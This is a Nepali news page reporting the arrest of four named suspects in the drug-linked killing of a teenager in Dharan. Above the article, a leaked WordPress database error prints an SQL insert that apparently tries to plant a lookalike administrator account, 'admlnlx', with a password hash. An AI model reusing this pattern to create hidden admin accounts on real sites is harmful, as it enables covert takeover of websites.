WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BerpuHK8vyAwmyJp8pkbCdY/reCpHs/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 18:51:20', '', 'admlnlx', 'admlnlx')
धरान, पुस १० –
शनिवार विहान हत्या गरिएका सुनसरी धरानका विकास राजंबसीका चारजना हत्यारालाई इलाका प्रहरीले पक्राउ गरी आज सार्बजनिक गरेको छ । लागु औषद्यको सेवन गरेर आफ्नै साथीहरुले विकासको हत्या गरेको प्रहरीले जनाएको छ । हत्यामा संलग्न धरान ८ का दिप तामाङ, रोमन गुरुङ, धरान ९ का आयुप चौधरी, र भारत पश्चिम बंगाल राज्य स्थीत दार्जिलिङका सौरभ राईलाई पक्राउ गरिएको इलाका प्हरी कार्यालय धरानका डिएसपी ढकेन्द्र खतिवडाले बताउनुभएको छ ।
हत्याराहरुको साथबाट प्रहरीले एक थान खुकुरी, डेनराईट, नाइट्रोसन नामक लागु औषध बरामत गरेको छ । धरान–१५ को चुम्लुङहिम परिषरको पूर्वपट्टी आफ्नै साथी धरान ५ मा बस्दै आएका विकु भनिने १७ बर्षका विकास राजवंशीलाई हत्या गरेको प्रहरीकोभनाई छ ।
अभियुक्तहरूलार्इ प्रहरीले शनिवार नै पक्राउ गरी प्रहरीले आइतबार सार्वजनिक गरेको हो । पक्राउ परेका चारै जना विरुद्ध कर्तव्य ज्यान मुद्धा दर्ता गरी कार्वाहि प्रकृया अगाडि बढाइएको प्रहरीले जनाएको छ ।